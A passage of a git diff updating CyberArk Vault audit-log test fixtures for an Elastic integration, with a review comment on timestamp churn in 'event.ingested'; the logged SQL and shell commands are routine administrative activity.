10:56:45\",\"IsoTimestamp\":\"2021-03-25T14:56:45Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT DECODE('A','A','1','2') FROM 
DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}",
 "code": "359",
 "kind": "event", 
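Review bot: The only change in this hunk is the `event.ingested` value, which is evidently stamped at processing time (it moved from June to December 2021 while the event's own timestamp stayed at 2021-03-25), so this expected-output fixture will differ on every regeneration; the hunks at -816, -935, -1054 and -1173 carry the same churn. Noise of this kind makes a real change to the expected output, such as a different `original` string or a remapped source address, easy to miss in review. Unless the package's pipeline test config already does so, mark `event.ingested` as a dynamic field so the comparison ignores it, for instance `dynamic_fields: event.ingested: ".*"` in the matching test log config, and regenerate once so the fixture stops carrying a wall-clock value. The enclosing event object starts and ends outside the hunk.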
@@ -816,7 +816,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:33.776980600Z",
+ "ingested": "2021-12-09T13:36:58.683128900Z",
 "original": "\u003c5\u003e1 2021-03-25T14:56:54Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:54\",\"IsoTimestamp\":\"2021-03-25T14:56:54Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE 
UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}",
 "code": "359",
 "kind": "event", 
@@ -935,7 +935,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:33.776982800Z",
+ "ingested": "2021-12-09T13:36:58.683132100Z",
 "original": "\u003c5\u003e1 2021-03-25T14:58:02Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT * FROM DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:02\",\"IsoTimestamp\":\"2021-03-25T14:58:02Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT * FROM 
DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}",
 "code": "359",
 "kind": "event", 
@@ -1054,7 +1054,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:33.776985100Z",
+ "ingested": "2021-12-09T13:36:58.683136Z",
 "original": "\u003c5\u003e1 2021-03-25T14:57:05Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:57:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:57:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:57:05\",\"IsoTimestamp\":\"2021-03-25T14:57:05Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE 
UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}",
 "code": "359",
 "kind": "event", 
@@ -1173,7 +1173,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:33.776987300Z",
+ "ingested": "2021-12-09T13:36:58.683141300Z",
 "original": "\u003c5\u003e1 2021-03-25T14:58:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=select distinct owner from all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:44\",\"IsoTimestamp\":\"2021-03-25T14:58:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=select distinct owner from 
all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}",
 "code": "359",
 "kind": "event", 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log
index 6c959f21d65..c6311470971 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log 
@@ -1,7 +1,7 @@
 {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"361","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}}
